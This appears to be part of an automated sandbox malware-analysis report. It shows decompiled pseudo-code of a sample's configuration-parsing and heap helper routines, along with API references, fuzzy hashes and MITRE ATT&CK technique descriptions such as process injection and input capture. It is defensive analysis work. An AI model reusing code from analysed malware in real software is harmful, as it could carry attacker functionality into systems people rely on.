								E00A41A10( *((intOrPtr*)(_t320 + 0xc)) + 0x10155,  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x28)));
								_t322 = _t322 + 8;
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *( *((intOrPtr*)(_t320 + 8)) + 0x2c) == 0) {
								L44:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x682b;
							} else {
								_t223 = E00A430B0( *( *((intOrPtr*)(_t320 + 8)) + 0x2c));
								_t322 = _t322 + 4;
								if(_t223 <= 0) {
									goto L44;
								} else {
									 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10d5c)) = StrToIntA( *( *((intOrPtr*)(_t320 + 8)) + 0x2c));
								}
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *( *((intOrPtr*)(_t320 + 8)) + 0x30) == 0) {
								L49:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x682c;
							} else {
								_t219 = E00A430B0( *( *((intOrPtr*)(_t320 + 8)) + 0x30));
								_t322 = _t322 + 4;
								if(_t219 <= 0) {
									goto L49;
								} else {
									 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10d60)) = StrToIntA( *( *((intOrPtr*)(_t320 + 8)) + 0x30));
								}
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *( *((intOrPtr*)(_t320 + 8)) + 0x38) == 0) {
								L54:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x6821;
							} else {
								_t215 = E00A430B0( *( *((intOrPtr*)(_t320 + 8)) + 0x38));
								_t322 = _t322 + 4;
								if(_t215 <= 0) {
									goto L54;
								} else {
									 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10d64)) = StrToIntA( *( *((intOrPtr*)(_t320 + 8)) + 0x38));
								}
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *( *((intOrPtr*)(_t320 + 8)) + 0x34) == 0) {
								L59:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x682d;
							} else {
								_t211 = E00A430B0( *( *((intOrPtr*)(_t320 + 8)) + 0x34));
								_t322 = _t322 + 4;
								if(_t211 <= 0) {
									goto L59;
								} else {
									 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10d68)) = StrToIntA( *( *((intOrPtr*)(_t320 + 8)) + 0x34));
								}
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x3c)) == 0) {
								L67:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x682e;
							} else {
								_t206 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x3c)));
								_t322 = _t322 + 4;
								if(_t206 <= 0) {
									goto L67;
								} else {
									_t208 = E00A43A90( *((intOrPtr*)(_t320 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x3c)),  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x3c)), 0xa49c54);
									_t322 = _t322 + 8;
									if(_t208 != 0) {
										 *((intOrPtr*)(_t320 - 0x20)) = 0;
									} else {
										 *((intOrPtr*)(_t320 - 0x20)) = 1;
									}
									 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc)) + 0x1003c)) =  *((intOrPtr*)(_t320 - 0x20));
								}
							}
						}
					}
				}
				if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x40)) == 0) {
					L75:
					 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
					 *((intOrPtr*)(_t320 - 8)) = 0x682f;
				} else {
					_t189 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x40)));
					_t322 = _t322 + 4;
					if(_t189 <= 0) {
						goto L75;
					} else {
						_t190 = E00A43A90(_t189,  *((intOrPtr*)(_t320 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x40)), 0xa49c58);
						_t322 = _t322 + 8;
						if(_t190 != 0) {
							 *((intOrPtr*)(_t320 - 0x24)) = 0;
						} else {
							 *((intOrPtr*)(_t320 - 0x24)) = 1;
						}
						 *((char*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10045)) =  *((intOrPtr*)(_t320 - 0x24));
					}
				}
				if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x44)) == 0) {
					L83:
					 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
					 *((intOrPtr*)(_t320 - 8)) = 0x6820;
				} else {
					_t245 =  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x44));
					if(E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x44))) <= 0) {
						goto L83;
					} else {
						if(E00A43A90( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x44)), _t245,  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x44)), 0xa49c5c) != 0) {
							 *((intOrPtr*)(_t320 - 0x28)) = 0;
						} else {
							 *((intOrPtr*)(_t320 - 0x28)) = 1;
						}
						 *((char*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10046)) =  *((intOrPtr*)(_t320 - 0x28));
					}
				}
				 *((char*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10019)) = 0;
				return  *((intOrPtr*)(_t320 - 8));
			}

0x00a44160
0x00a4417a
0x00a4417f
0x00a44184
0x00a44192
0x00a44196
0x00a4419b
0x00a441a0
0x00a441b2
0x00a44206
0x00a44209
0x00a44210
0x00a441bd
0x00a441c0
0x00a441c4
0x00a441c9
0x00a441ce
0x00000000
0x00a441d0
0x00a441dc
0x00a441e1
0x00a441e6
0x00a441f1
0x00a441e8
0x00a441e8
0x00a441e8
0x00a441fe
0x00a441fe
0x00a441ce
0x00a4421e
0x00a44234
0x00a44220
0x00a44227
0x00a4422c
0x00a4422f
0x00a4422f
0x00a44247
0x00a4427e
0x00a44285
0x00a44261
0x00a44271
0x00a44276
0x00a44276
0x00a44298
0x00a442ec
0x00a442ef
0x00a442a3
0x00a442aa
0x00a442af
0x00a442b4
0x00000000
0x00a442b6
0x00a442c2
0x00a442c7
0x00a442cc
0x00a442d7
0x00a442ce
0x00a442ce
0x00a442ce
0x00a442e4
0x00a442e4
0x00a442b4
0x00a442fd
0x00a44313
0x00a442ff
0x00a44306
0x00a4430b
0x00a4430e
0x00a4430e
0x00a44326
0x00a4435e
0x00a44365
0x00a44340
0x00a44351
0x00a44356
0x00a44356
0x00a44378
0x00a443ae
0x00a443b1
0x00a443b8
0x00a44383
0x00a4438a
0x00a4438f
0x00a44394
0x00000000
0x00a44396
0x00a443a6
0x00a443a6
0x00a44394
0x00a443cb
0x00a44401
0x00a44404
0x00a4440b
0x00a443d6
0x00a443dd
0x00a443e2
0x00a443e7
0x00000000
0x00a443e9
0x00a443f9
0x00a443f9
0x00a443e7
0x00a4441e
0x00a44454
0x00a44457
0x00a4445e
0x00a44429
0x00a44430
0x00a44435
0x00a4443a
0x00000000
0x00a4443c
0x00a4444c
0x00a4444c
0x00a4443a
0x00a44471
0x00a444a7
0x00a444aa
0x00a444b1
0x00a4447c
0x00a44483
0x00a44488
0x00a4448d
0x00000000
0x00a4448f
0x00a4449f
0x00a4449f
0x00a4448d
0x00a444c4
0x00a44518
0x00a4451b
0x00a44522
0x00a444cf
0x00a444d6
0x00a444db
0x00a444e0
0x00000000
0x00a444e2
0x00a444ee
0x00a444f3
0x00a444f8
0x00a44503
0x00a444fa
0x00a444fa
0x00a444fa
0x00a44510
0x00a44510
0x00a444e0
0x00a444c4
0x00a441a0
0x00a44184
0x00a44535
0x00a44589
0x00a4458c
0x00a44593
0x00a44540
0x00a44547
0x00a4454c
0x00a44551
0x00000000
0x00a44553
0x00a4455f
0x00a44564
0x00a44569
0x00a44574
0x00a4456b
0x00a4456b
0x00a4456b
0x00a44581
0x00a44581
0x00a44551
0x00a445a6
0x00a445fa
0x00a445fd
0x00a44604
0x00a445b1
0x00a445b4
0x00a445c2
0x00000000
0x00a445c4
0x00a445da
0x00a445e5
0x00a445dc
0x00a445dc
0x00a445dc
0x00a445f2
0x00a445f2
0x00a445c2
0x00a4460e
0x00a4461b

APIs

StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,00A44BE3), ref: 00A4439D
StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,00A44BE3), ref: 00A443F0
StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,00A44BE3), ref: 00A44443
StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,00A44BE3), ref: 00A44496

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 927bf7a1d4023f9c77730bf601fca45fa17bb03042052970946e9669bfe144cf
Instruction ID: 856b139bd23e2769c250cf9acf48d370ce150da1915042af3f827b3b11284c7d
Opcode Fuzzy Hash: 927bf7a1d4023f9c77730bf601fca45fa17bb03042052970946e9669bfe144cf
Instruction Fuzzy Hash: 3FD1497C600204ABDB14CF64C584BAA7BB5AFC8355F188168EC4A8F342E775EE85DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A44146 Relevance: 6.3, APIs: 4, Instructions: 313
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A44146() {
				void* _t189;
				void* _t190;
				void* _t193;
				void* _t194;
				void* _t206;
				void* _t208;
				void* _t211;
				void* _t215;
				void* _t219;
				void* _t223;
				intOrPtr _t228;
				void* _t230;
				void* _t231;
				intOrPtr _t238;
				void* _t240;
				void* _t242;
				void* _t320;
				void* _t322;

				if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) == 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x18)) != 0) {
					_t193 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x18)));
					_t322 = _t322 + 4;
					if(_t193 > 0) {
						_t8 =  *((intOrPtr*)(_t320 + 8)) + 0x18; // 0x31
						_t194 = E00A43A90(_t193,  *((intOrPtr*)(_t320 + 8)),  *_t8, 0xa49c48);
						_t322 = _t322 + 8;
						if(_t194 == 0) {
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x1c)) == 0) {
								L12:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x6828;
							} else {
								_t279 =  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x1c));
								_t240 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x1c)));
								_t322 = _t322 + 4;
								if(_t240 <= 0) {
									goto L12;
								} else {
									_t242 = E00A43A90( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x1c)), _t279,  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x1c)), 0xa49c4c);
									_t322 = _t322 + 8;
									if(_t242 != 0) {
										 *((intOrPtr*)(_t320 - 0x18)) = 0;
									} else {
										 *((intOrPtr*)(_t320 - 0x18)) = 1;
									}
									 *((char*)( *((intOrPtr*)(_t320 + 0xc)) + 0x1001a)) =  *((intOrPtr*)(_t320 - 0x18));
								}
							}
							if( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x20)) == 0) {
								 *((intOrPtr*)(_t320 - 4)) = 0xffffffff;
							} else {
								_t238 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x20)));
								_t322 = _t322 + 4;
								 *((intOrPtr*)(_t320 - 4)) = _t238;
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x20)) == 0 ||  *((intOrPtr*)(_t320 - 4)) <= 0 ||  *((intOrPtr*)(_t320 - 4)) >= 0xff) {
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x6829;
							} else {
								E00A41A10( *((intOrPtr*)(_t320 + 0xc)) + 0x10047,  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x20)));
								_t322 = _t322 + 8;
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x24)) == 0) {
								L29:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
							} else {
								_t230 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x24)));
								_t322 = _t322 + 4;
								if(_t230 <= 0) {
									goto L29;
								} else {
									_t231 = E00A43A90(_t230,  *((intOrPtr*)(_t320 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x24)), 0xa49c50);
									_t322 = _t322 + 8;
									if(_t231 != 0) {
										 *((intOrPtr*)(_t320 - 0x1c)) = 0;
									} else {
										 *((intOrPtr*)(_t320 - 0x1c)) = 1;
									}
									 *((char*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10154)) =  *((intOrPtr*)(_t320 - 0x1c));
								}
							}
							if( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x28)) == 0) {
								 *((intOrPtr*)(_t320 - 4)) = 0xffffffff;
							} else {
								_t228 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x28)));
								_t322 = _t322 + 4;
								 *((intOrPtr*)(_t320 - 4)) = _t228;
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x28)) == 0 ||  *((intOrPtr*)(_t320 - 4)) <= 0 ||  *((intOrPtr*)(_t320 - 4)) >= 0x400) {
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x682a;
							} else {
								E00A41A10( *((intOrPtr*)(_t320 + 0xc)) + 0x10155,  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x28)));
								_t322 = _t322 + 8;
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *( *((intOrPtr*)(_t320 + 8)) + 0x2c) == 0) {
								L43:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x682b;
							} else {
								_t223 = E00A430B0( *( *((intOrPtr*)(_t320 + 8)) + 0x2c));
								_t322 = _t322 + 4;
								if(_t223 <= 0) {
									goto L43;
								} else {
									 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10d5c)) = StrToIntA( *( *((intOrPtr*)(_t320 + 8)) + 0x2c));
								}
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *( *((intOrPtr*)(_t320 + 8)) + 0x30) == 0) {
								L48:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x682c;
							} else {
								_t219 = E00A430B0( *( *((intOrPtr*)(_t320 + 8)) + 0x30));
								_t322 = _t322 + 4;
								if(_t219 <= 0) {
									goto L48;
								} else {
									 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10d60)) = StrToIntA( *( *((intOrPtr*)(_t320 + 8)) + 0x30));
								}
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *( *((intOrPtr*)(_t320 + 8)) + 0x38) == 0) {
								L53:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x6821;
							} else {
								_t215 = E00A430B0( *( *((intOrPtr*)(_t320 + 8)) + 0x38));
								_t322 = _t322 + 4;
								if(_t215 <= 0) {
									goto L53;
								} else {
									 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10d64)) = StrToIntA( *( *((intOrPtr*)(_t320 + 8)) + 0x38));
								}
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *( *((intOrPtr*)(_t320 + 8)) + 0x34) == 0) {
								L58:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x682d;
							} else {
								_t211 = E00A430B0( *( *((intOrPtr*)(_t320 + 8)) + 0x34));
								_t322 = _t322 + 4;
								if(_t211 <= 0) {
									goto L58;
								} else {
									 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10d68)) = StrToIntA( *( *((intOrPtr*)(_t320 + 8)) + 0x34));
								}
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x3c)) == 0) {
								L66:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x682e;
							} else {
								_t206 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x3c)));
								_t322 = _t322 + 4;
								if(_t206 <= 0) {
									goto L66;
								} else {
									_t208 = E00A43A90( *((intOrPtr*)(_t320 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x3c)),  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x3c)), 0xa49c54);
									_t322 = _t322 + 8;
									if(_t208 != 0) {
										 *((intOrPtr*)(_t320 - 0x20)) = 0;
									} else {
										 *((intOrPtr*)(_t320 - 0x20)) = 1;
									}
									 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc)) + 0x1003c)) =  *((intOrPtr*)(_t320 - 0x20));
								}
							}
						}
					}
				}
				if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x40)) == 0) {
					L74:
					 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
					 *((intOrPtr*)(_t320 - 8)) = 0x682f;
				} else {
					_t189 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x40)));
					_t322 = _t322 + 4;
					if(_t189 <= 0) {
						goto L74;
					} else {
						_t190 = E00A43A90(_t189,  *((intOrPtr*)(_t320 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x40)), 0xa49c58);
						_t322 = _t322 + 8;
						if(_t190 != 0) {
							 *((intOrPtr*)(_t320 - 0x24)) = 0;
						} else {
							 *((intOrPtr*)(_t320 - 0x24)) = 1;
						}
						 *((char*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10045)) =  *((intOrPtr*)(_t320 - 0x24));
					}
				}
				if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x44)) == 0) {
					L82:
					 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
					 *((intOrPtr*)(_t320 - 8)) = 0x6820;
				} else {
					_t245 =  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x44));
					if(E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x44))) <= 0) {
						goto L82;
					} else {
						if(E00A43A90( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x44)), _t245,  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x44)), 0xa49c5c) != 0) {
							 *((intOrPtr*)(_t320 - 0x28)) = 0;
						} else {
							 *((intOrPtr*)(_t320 - 0x28)) = 1;
						}
						 *((char*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10046)) =  *((intOrPtr*)(_t320 - 0x28));
					}
				}
				 *((char*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10019)) = 0;
				return  *((intOrPtr*)(_t320 - 8));
			}

APIs

StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,00A44BE3), ref: 00A4439D
StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,00A44BE3), ref: 00A443F0
StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,00A44BE3), ref: 00A44443
StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,00A44BE3), ref: 00A44496

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d5e3b40641ba006ca4b4f8d38b310c1cf8f35bae0ac24d1f14776e5095ab34
Instruction ID: d03aad78d5306f34aedc5fddc032f9d8c8a49ce9050a9267fc339f0c37f2e037
Opcode Fuzzy Hash: 40d5e3b40641ba006ca4b4f8d38b310c1cf8f35bae0ac24d1f14776e5095ab34
Instruction Fuzzy Hash: 5FD1497C600204ABDB14CF64C584BAA7BB5AFC8355F188168EC4A8F342E775EE85DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A424F0 Relevance: 6.0, APIs: 4, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00A424F0(void* __ecx, void* _a4) {
				long _v8;
				void* _t8;

				if(_a4 != 0) {
					_v8 = HeapSize(GetProcessHeap(), 0, _a4);
					if(_v8 != 0xffffffff) {
						E00A423E0(_v8, _a4, _v8);
					}
					return HeapFree(GetProcessHeap(), 0, _a4);
				}
				return _t8;
			}

0x00a424f8
0x00a4250d
0x00a42514
0x00a4251e
0x00a4251e
0x00000000
0x00a42530
0x00a42539

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000001,?,00A4263C,00A45167,?,00A451B5,00000001,000001AC,00000000), ref: 00A42500
HeapSize.KERNEL32(00000000,?,00A4263C,00A45167,?,00A451B5,00000001,000001AC,00000000), ref: 00A42507
GetProcessHeap.KERNEL32(00000000,00000000,?,00A4263C,00A45167,?,00A451B5,00000001,000001AC,00000000), ref: 00A42529
HeapFree.KERNEL32(00000000,?,00A4263C,00A45167,?,00A451B5,00000001,000001AC,00000000), ref: 00A42530

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeSize
String ID:
API String ID: 1305341483-0
Opcode ID: f4ff2b93507c2aef8a38cb9a8d8881b48c8b05020ed12f3279b9df83f8369fbf
Instruction ID: 8247bae8a240b7d88e9e8cafed3d08a7f6fb5b2442c92750483c408cedde33e6
Opcode Fuzzy Hash: f4ff2b93507c2aef8a38cb9a8d8881b48c8b05020ed12f3279b9df83f8369fbf
Instruction Fuzzy Hash: C8F08C7D500208FBCB10DFE4EC49BAF7B78EB89301F008208FA058B190D7359A51DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A42450 Relevance: 5.0, APIs: 4, Instructions: 25
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A42450(void* _a4, long _a8) {

				if(_a8 != 0) {
					if(_a4 != 0) {
						return HeapReAlloc(GetProcessHeap(), 8, _a4, _a8);
					}
					return HeapAlloc(GetProcessHeap(), 8, _a8);
				}
				return 0;
			}

0x00a42457
0x00a42461
0x00000000
0x00a4248b
0x00000000
0x00a42470
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A42469
HeapAlloc.KERNEL32(00000000), ref: 00A42470

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 31247ab4218be0d4c1f5755a1a1e06352a082efcdd769121e3308ca6eb46793e
Instruction ID: 58e5b95953fa439f487382c7833999291fda264301352f9f70f5b90c95900267
Opcode Fuzzy Hash: 31247ab4218be0d4c1f5755a1a1e06352a082efcdd769121e3308ca6eb46793e
Instruction Fuzzy Hash: 33E0C27D140218EBDB10DBE4E849BAB3778FBC9311F40C404BA9A8A090CB7699A5DB60

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
